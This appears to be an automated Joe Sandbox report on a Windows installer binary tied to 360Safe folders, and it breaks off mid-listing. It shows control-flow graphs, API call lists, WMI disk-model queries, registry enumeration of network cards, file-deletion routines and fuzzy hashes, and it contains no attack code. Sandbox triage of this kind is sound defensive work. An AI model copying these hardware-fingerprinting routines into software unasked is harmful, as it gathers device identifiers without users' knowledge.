                                                                                                                                                                                                                      control_flow_graph 598 ae3bfd-ae3c2a call af5454 CoCreateInstance 601 ae3f39-ae3f42 598->601 602 ae3c30-ae3c75 call ad573a SysFreeString 598->602 604 ae3f4a-ae3f51 call af54f9 601->604 605 ae3f44-ae3f46 601->605 610 ae3c7b-ae3c90 CoSetProxyBlanket 602->610 611 ae3f29-ae3f31 602->611 605->604 610->611 613 ae3c96-ae3d33 call ace782 call a8cbde call a7ba90 call a8cc03 call ad573a call ae17e6 SysFreeString * 2 610->613 611->601 612 ae3f33-ae3f35 611->612 612->601 627 ae3d39-ae3d4d call a7ba90 613->627 628 ae3f02-ae3f0b 613->628 634 ae3db0-ae3db3 627->634 630 ae3f0d-ae3f0f 628->630 631 ae3f13-ae3f24 call a7dd20 * 2 628->631 630->631 631->611 637 ae3d4f-ae3d73 634->637 638 ae3db5 634->638 643 ae3ddb-ae3de4 637->643 644 ae3d75-ae3d90 VariantClear 637->644 639 ae3dec-ae3e05 call a8cc03 638->639 645 ae3e07-ae3e0c 639->645 646 ae3e10-ae3e5f call ad573a call ae17e6 SysFreeString * 2 639->646 643->639 647 ae3de6-ae3de8 643->647 649 ae3d94-ae3d96 644->649 645->646 661 ae3ef7-ae3efd call a7dd20 646->661 662 ae3e65-ae3e6d 646->662 647->639 651 ae3d9f-ae3da8 649->651 652 ae3d98-ae3d9d 649->652 651->634 654 ae3daa-ae3dac 651->654 652->651 653 ae3db7-ae3dd6 call ae2533 call a8cb91 call a7dd20 652->653 653->643 654->634 661->628 662->661 665 ae3e73-ae3e92 662->665 668 ae3ee6-ae3eef 665->668 669 ae3e94-ae3eb5 VariantClear 665->669 668->661 670 ae3ef1-ae3ef3 668->670 669->668 672 ae3eb7-ae3ebc 669->672 670->661 672->668 673 ae3ebe-ae3ed5 call ae2599 672->673 673->668
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00AE3C04
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00B3C868,00000000,00000001,00B3C798,?,00000038,00AE4568,?,?,?,?,?,0000001C,00ADEAD1,?,?), ref: 00AE3C22
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE3C71
                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE3C88
                                                                                                                                                                                                                        • Part of subcall function 00ACE782: __EH_prolog3_GS.LIBCMT ref: 00ACE789
                                                                                                                                                                                                                        • Part of subcall function 00ACE782: _wcslen.LIBCMT ref: 00ACE7C4
                                                                                                                                                                                                                        • Part of subcall function 00AD573A: SysAllocString.OLEAUT32(?), ref: 00AD5751
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE3D26
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE3D2F
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00AE3D79
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE3E56
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE3E5B
                                                                                                                                                                                                                        • Part of subcall function 00AE2533: __EH_prolog3.LIBCMT ref: 00AE253A
                                                                                                                                                                                                                        • Part of subcall function 00AE2533: VariantInit.OLEAUT32(?), ref: 00AE2556
                                                                                                                                                                                                                        • Part of subcall function 00AE2533: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 00AE256B
                                                                                                                                                                                                                        • Part of subcall function 00AE2533: VariantClear.OLEAUT32(?), ref: 00AE2589
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00AE3E98
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Model, xrefs: 00AE3EAA
                                                                                                                                                                                                                      • WQL, xrefs: 00AE3CF1, 00AE3E21
                                                                                                                                                                                                                      • DeviceID, xrefs: 00AE3D8B
                                                                                                                                                                                                                      • ROOT\CIMV2, xrefs: 00AE3C36
                                                                                                                                                                                                                      • ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition, xrefs: 00AE3CC7
                                                                                                                                                                                                                      • ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive, xrefs: 00AE3DF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$FreeVariant$Clear$AllocBlanketChangeCreateH_prolog3H_prolog3_H_prolog3_catchInitInstanceProxyType_wcslen
                                                                                                                                                                                                                      • String ID: ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive$ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition$DeviceID$Model$ROOT\CIMV2$WQL
                                                                                                                                                                                                                      • API String ID: 3888685156-88420156
                                                                                                                                                                                                                      • Opcode ID: 399be9746cc064170cb63a2d6824a2517043a9f3c24d05ee8e85aa887fcd8ed8
                                                                                                                                                                                                                      • Instruction ID: f08073b42b500d549687d99c802193297299717df6b385fb95462f0dfa6e432e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 399be9746cc064170cb63a2d6824a2517043a9f3c24d05ee8e85aa887fcd8ed8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7B10771900249EFDF00DFE4C989AEDBBB9AF08304F248499F505BB291CB75AE45CB61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AD08F7
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000415), ref: 00AD0A0B
                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00AD0A13
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000048,00000095,0000003C,00000014,00000001,?,0000002C), ref: 00AD0A32
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD0A3E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000415), ref: 00AD0A59
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00AD0A71
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,00000030,0000001A,00000001), ref: 00AD0AD3
                                                                                                                                                                                                                        • Part of subcall function 00AD03BF: __EH_prolog3.LIBCMT ref: 00AD03C6
                                                                                                                                                                                                                        • Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B
                                                                                                                                                                                                                        • Part of subcall function 00AC1610: EnableWindow.USER32(?,?), ref: 00AC161B
                                                                                                                                                                                                                        • Part of subcall function 00AC1610: InvalidateRect.USER32(?,00000000,00000001,?,?,00AA5AF9,?), ref: 00AC162A
                                                                                                                                                                                                                        • Part of subcall function 00AC1610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00AA5AF9,?), ref: 00AC163C
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,00000136,00000028,00000001), ref: 00AD0AEA
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,00000050,00000014,00000001), ref: 00AD0B04
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,0000008B,00000016,00000001), ref: 00AD0B25
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0B3E
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0B48
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0B52
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0B5C
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000415), ref: 00AD0B65
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD0B6E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$MoveShow$Item$EnableH_prolog3Rect$InvalidateMessageRedrawSend_wcsnlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2541736847-0
                                                                                                                                                                                                                      • Opcode ID: 79d470fdf9a176cb4f121ebee6a4d17fe737498965ea6926b4684b0888675ff3
                                                                                                                                                                                                                      • Instruction ID: 1e419fa722e893c0fd942a06d925a3646900003cc8635680c266bb08bd4f88de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79d470fdf9a176cb4f121ebee6a4d17fe737498965ea6926b4684b0888675ff3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34714A70A40608AFDB21EBA4CD45FEEBBB5EF54304F144419F256BB2E2DBB06A40DB51

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 817 adea27-adea7c call af5421 call a7ba90 call ad87f5 824 adeb69-adeb76 call a7dd20 817->824 825 adea82-adeaaf call afee20 call ae2080 call add372 817->825 830 adeb77-adeb99 call af4647 824->830 837 adead5-adead8 825->837 838 adeab1-adeab6 825->838 841 adeada-adeae1 837->841 842 adeae3-adeafa call a898bb call ade951 837->842 839 adeab8-adeabd call a7dfb0 838->839 840 adeac2-adeacc call ae44e3 838->840 839->840 848 adead1-adead3 840->848 841->842 845 adeb1a-adeb35 call a898bb call ade951 841->845 842->845 855 adeafc-adeb18 call ae20fb call a7dd20 842->855 856 adeb9c-adebb6 call a9f3e3 call ade994 845->856 857 adeb37-adeb4e call a898bb call ade334 845->857 848->837 848->845 855->830 871 adebce-adebe2 856->871 872 adebb8-adebc9 call a9e3e6 call af453e 856->872 857->856 870 adeb50-adeb53 857->870 876 adeb5a-adeb64 call ae20fb 870->876 877 adeb55-adeb58 870->877 873 adebe8-adebee 871->873 874 adeeb5-adeed3 call a8cb91 call a9e3e6 call af453e 871->874 872->855 878 adebf4-adec82 call af4550 SHGetSpecialFolderPathW PathAppendW call a9f087 call ad87f5 call afee20 call a7c8e0 873->878 895 adeed9-adeedd 874->895 876->824 877->856 877->876 902 adecc8-adecdf call a898bb call ade951 878->902 903 adec84 878->903 898 adeea6-adeeac 895->898 898->878 900 adeeb2 898->900 900->874 917 aded01-aded50 call a7ba90 GetTickCount call a8cc03 call a8a8eb call a898bb call ade951 902->917 918 adece1-adecfb call a898bb call ade334 902->918 905 adec8e-adec94 903->905 906 adec86-adec8c 903->906 905->898 908 adec9a-adeca2 905->908 906->902 906->905 909 adecac-adecb2 908->909 910 adeca4-adeca6 908->910 913 adecbd-adecc3 call a8cb91 909->913 914 adecb4-adecb7 909->914 910->909 912 adeef5-adef06 call a9e3e6 call af453e 910->912 913->902 914->895 914->913 937 aded72-adede2 call af4550 SHGetSpecialFolderPathW PathAppendW call a9f087 call a7c8e0 call a8a8eb call a898bb call ade951 917->937 938 aded52-aded6c call a898bb call ade334 917->938 918->900 918->917 958 adee04-adee4b call a9f087 call addb55 call a8cbde call a8a8eb call a898bb call ade951 937->958 959 adede4-adedfe call a898bb call ade334 937->959 938->937 948 adeedf-adeeeb call a7dd20 938->948 948->900 976 adee4d-adee67 call a898bb call ade334 958->976 977 adee69-adee75 958->977 959->948 959->958 976->948 976->977 978 adee95-adeea3 call a7dd20 977->978 979 adee77-adee7a 977->979 978->898 982 adee7c-adee7e 979->982 983 adee80-adee84 979->983 982->983 986 adee87-adee8a 982->986 983->986 986->978 989 adee8c-adee8f 986->989 989->978 990 adee91-adee93 989->990 990->978 991 adeeed-adeef0 call a7dd20 990->991 991->912
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ADEA49
                                                                                                                                                                                                                        • Part of subcall function 00AD87F5: _memset.LIBCMT ref: 00AD8838
                                                                                                                                                                                                                        • Part of subcall function 00AD87F5: __wsplitpath.LIBCMT ref: 00AD8845
                                                                                                                                                                                                                        • Part of subcall function 00AD87F5: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AD8874
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ADEA8E
                                                                                                                                                                                                                        • Part of subcall function 00AE2080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00ADEAA4,?,?,00100000,00000000,0000008C), ref: 00AE20EE
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADEC0A
                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,00100000,00000000,0000008C), ref: 00ADEC1F
                                                                                                                                                                                                                      • PathAppendW.SHLWAPI(?,360\360Safe), ref: 00ADEC2D
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ADEC63
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00ADED12
                                                                                                                                                                                                                        • Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADED82
                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 00ADED94
                                                                                                                                                                                                                      • PathAppendW.SHLWAPI(00000000,360Safe), ref: 00ADED9F
                                                                                                                                                                                                                        • Part of subcall function 00A9F087: std::_String_base::_Xlen.LIBCPMT ref: 00A9F09C
                                                                                                                                                                                                                        • Part of subcall function 00A8A8EB: _wcsnlen.LIBCMT ref: 00A8A91D
                                                                                                                                                                                                                        • Part of subcall function 00ADE951: __EH_prolog3.LIBCMT ref: 00ADE958
                                                                                                                                                                                                                        • Part of subcall function 00ADE334: __EH_prolog3.LIBCMT ref: 00ADE33B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Path$H_prolog3_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountCriticalDiskException@8FreeInitializeSectionSpaceString_base::_ThrowTickXlen__wsplitpath_wcsnlenstd::_
                                                                                                                                                                                                                      • String ID: 360Safe$360\360Safe$:\360Safe
                                                                                                                                                                                                                      • API String ID: 1315137449-2735685471
                                                                                                                                                                                                                      • Opcode ID: 281f1e62f357ae9fa267c8e151a3b8064541f32c71d3eee8ea9b8d13a80e5123
                                                                                                                                                                                                                      • Instruction ID: 0803ae5ea7f2de6a61effeed736fd5b55fac8ef8ed40641b4f1fb43ed7075bf5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 281f1e62f357ae9fa267c8e151a3b8064541f32c71d3eee8ea9b8d13a80e5123
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96E18071D0021AABCF15FFA4CD56AFEB7B9AF08710F14442AF416BB291DB305A44CBA5

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 993 acf9f1-acfa25 call af5421 996 acfa2f-acfa35 993->996 997 acfa27 993->997 999 acfa3b-acfa3e 996->999 1000 acfa37-acfa39 996->1000 998 acfa29-acfa2a 997->998 1001 acfd97-acfdb9 call af4647 998->1001 1002 acfa48-acfa4b 999->1002 1003 acfa40-acfa43 999->1003 1000->998 1005 acfa4d-acfa52 call a7dfb0 1002->1005 1006 acfa57-acfa61 1002->1006 1003->1001 1005->1006 1008 acfa72-acfa76 1006->1008 1009 acfa63-acfa66 1006->1009 1011 acfabf-acfac7 1008->1011 1012 acfa78-acfa86 call a9e237 1008->1012 1009->1005 1013 acfa68-acfa70 1009->1013 1015 acfaed-acfaf0 1011->1015 1016 acfac9-acface 1011->1016 1024 acfa8d-acfa91 1012->1024 1025 acfa88-acfa8b 1012->1025 1013->1003 1013->1008 1020 acfb08-acfb0b 1015->1020 1021 acfaf2-acfaf5 1015->1021 1017 acfadf-acfae1 1016->1017 1018 acfad0 1016->1018 1017->1001 1018->1005 1022 acfad6-acfadd 1018->1022 1026 acfb0d-acfb29 1020->1026 1027 acfb52-acfb87 call af4550 GetWindowsDirectoryW PathIsSameRootW 1020->1027 1021->1005 1023 acfafb-acfb02 1021->1023 1022->1015 1022->1017 1023->1003 1023->1020 1028 acfae6-acfae8 1024->1028 1029 acfa93-acfa97 1024->1029 1025->1024 1025->1028 1026->1005 1030 acfb2f-acfb49 GetDriveTypeW 1026->1030 1036 acfb8d-acfb99 call accc5c 1027->1036 1037 acfc19-acfc2a ShowWindow 1027->1037 1028->998 1029->1028 1033 acfa99-acfa9d 1029->1033 1030->1027 1032 acfb4b 1030->1032 1032->1027 1033->1028 1035 acfa9f-acfaa3 1033->1035 1035->1028 1040 acfaa5-acfaa9 1035->1040 1044 acfbe9-acfbfd ShowWindow 1036->1044 1045 acfb9b-acfba1 1036->1045 1038 acfc2d-acfc34 call add372 1037->1038 1049 acfc3a-acfc87 call a7b680 call a96a58 call a9803c * 2 call a966fb 1038->1049 1050 acfd06-acfd1f call a9ecb6 PathFileExistsW 1038->1050 1040->1028 1043 acfaab-acfaaf 1040->1043 1043->1028 1047 acfab1-acfab5 1043->1047 1044->1005 1051 acfc03-acfc10 call acccb7 1044->1051 1045->1005 1048 acfba7-acfbc4 call ace782 call acec16 1045->1048 1047->1028 1052 acfab7-acfabd 1047->1052 1048->1044 1073 acfbc6-acfbe2 call ab73d5 ShowWindow 1048->1073 1099 acfc89-acfcb1 call a8afb8 PathIsDirectoryW call a7dd20 1049->1099 1100 acfcd6-acfcd9 call acd292 1049->1100 1063 acfd5e-acfd68 call acd9fc 1050->1063 1064 acfd21-acfd30 call a898bb call a9f326 1050->1064 1051->1038 1061 acfc12 1051->1061 1052->1011 1052->1012 1061->1037 1074 acfd6f-acfd87 call ad88ab 1063->1074 1075 acfd6a 1063->1075 1082 acfd35-acfd37 1064->1082 1073->1044 1091 acfd8d-acfd95 call a9f2d0 1074->1091 1092 acfd89-acfd8b 1074->1092 1081 acfd6c-acfd6d 1075->1081 1085 acfd4c-acfd54 call a9f2d0 1081->1085 1082->1074 1087 acfd39-acfd3c 1082->1087 1097 acfccf-acfcd1 1085->1097 1087->1063 1089 acfd3e-acfd43 1087->1089 1089->1063 1096 acfd45-acfd4a 1089->1096 1091->1001 1092->1081 1096->1085 1098 acfd59-acfd5c 1096->1098 1097->1001 1098->1085 1113 acfce6 1099->1113 1114 acfcb3 1099->1114 1105 acfcde-acfce0 1100->1105 1107 acfce9-acfd01 call a7dd20 * 2 1105->1107 1108 acfce2-acfce4 1105->1108 1107->1050 1110 acfcb5-acfcca call a7dd20 * 2 1108->1110 1110->1097 1113->1107 1114->1110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                                                                      • String ID: A:\$\360Safe
                                                                                                                                                                                                                      • API String ID: 431132790-271697628
                                                                                                                                                                                                                      • Opcode ID: 1ba103eeb7052105396da1120ddebf56f47f93284e65e91fa687db2e379d7620
                                                                                                                                                                                                                      • Instruction ID: 810b5ef87524c375cca36b7f07bdff51345cb802a7dd033947f83ac8fd423345
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ba103eeb7052105396da1120ddebf56f47f93284e65e91fa687db2e379d7620
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74A1EF746002049FDB24EB64DD5AFBEB7B6AF04344F12403EF96A9B2A6EB309D41C751

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ADEF2C
                                                                                                                                                                                                                        • Part of subcall function 00AFAF4F: __wcstoi64.LIBCMT ref: 00AFAF2C
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADEF75
                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000000,?,?,00000018), ref: 00ADEF94
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?,360\360Safe,?,?,00000018), ref: 00ADEFBB
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000000,?,?,00000018), ref: 00ADEFD0
                                                                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 00ADEFDD
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000018), ref: 00ADEFEA
                                                                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 00ADF00A
                                                                                                                                                                                                                      • PathIsDirectoryEmptyW.SHLWAPI(?), ref: 00ADF017
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00ADF03B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Path$Directory$File$CombineCountDeleteEmptyExistsFolderH_prolog3SpecialTick__wcstoi64_memset
                                                                                                                                                                                                                      • String ID: 360\360Safe$\360Safe
                                                                                                                                                                                                                      • API String ID: 2943068809-3795500535
                                                                                                                                                                                                                      • Opcode ID: 3e6428834aff7499f02a8350a814ede2d2a731cf54e357e5a73f2bdb37971d8b
                                                                                                                                                                                                                      • Instruction ID: 922c8552269cdce537cdd5bc5539d66e7125ce846c4de365e9dc3290a8dcbd5e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e6428834aff7499f02a8350a814ede2d2a731cf54e357e5a73f2bdb37971d8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB716B71900109ABCB14FBA4CD56BFFB7B8AF14314F104529F526A72D2EF30AA08CB61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 1204 af29e0-af2a02 1205 af2a08-af2a10 1204->1205 1206 af2be1-af2bf8 call af4647 1204->1206 1205->1206 1208 af2a16-af2a42 call af4550 RegOpenKeyExA 1205->1208 1212 af2ba8-af2bad 1208->1212 1213 af2a48-af2a74 RegEnumKeyExA 1208->1213 1212->1206 1216 af2baf-af2be0 call a82840 call af4647 1212->1216 1214 af2b9b-af2ba7 RegCloseKey 1213->1214 1215 af2a7a 1213->1215 1214->1212 1217 af2a80-af2a9e RegOpenKeyExA 1215->1217 1219 af2b69-af2b91 RegEnumKeyExA 1217->1219 1220 af2aa4-af2ad6 RegQueryValueExA 1217->1220 1219->1217 1224 af2b97 1219->1224 1222 af2b5e-af2b63 RegCloseKey 1220->1222 1223 af2adc-af2afd call af4550 call af28d0 1220->1223 1222->1219 1230 af2b02-af2b07 1223->1230 1224->1214 1230->1222 1231 af2b09-af2b0e 1230->1231 1232 af2b22-af2b34 1231->1232 1233 af2b10-af2b20 lstrcmpA 1231->1233 1234 af2b36-af2b3e 1232->1234 1233->1222 1233->1232 1235 af2b51-af2b53 1234->1235 1236 af2b40-af2b45 1234->1236 1238 af2b56-af2b59 1235->1238 1239 af2b55 1235->1239 1236->1235 1237 af2b47-af2b4d 1236->1237 1237->1234 1240 af2b4f 1237->1240 1238->1222 1239->1238 1240->1239
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF2A1F
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 00AF2A3A
                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00B5CDA4,?,?,?,?), ref: 00AF2A6C
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 00AF2A96
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 00AF2ACE
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF2AE7
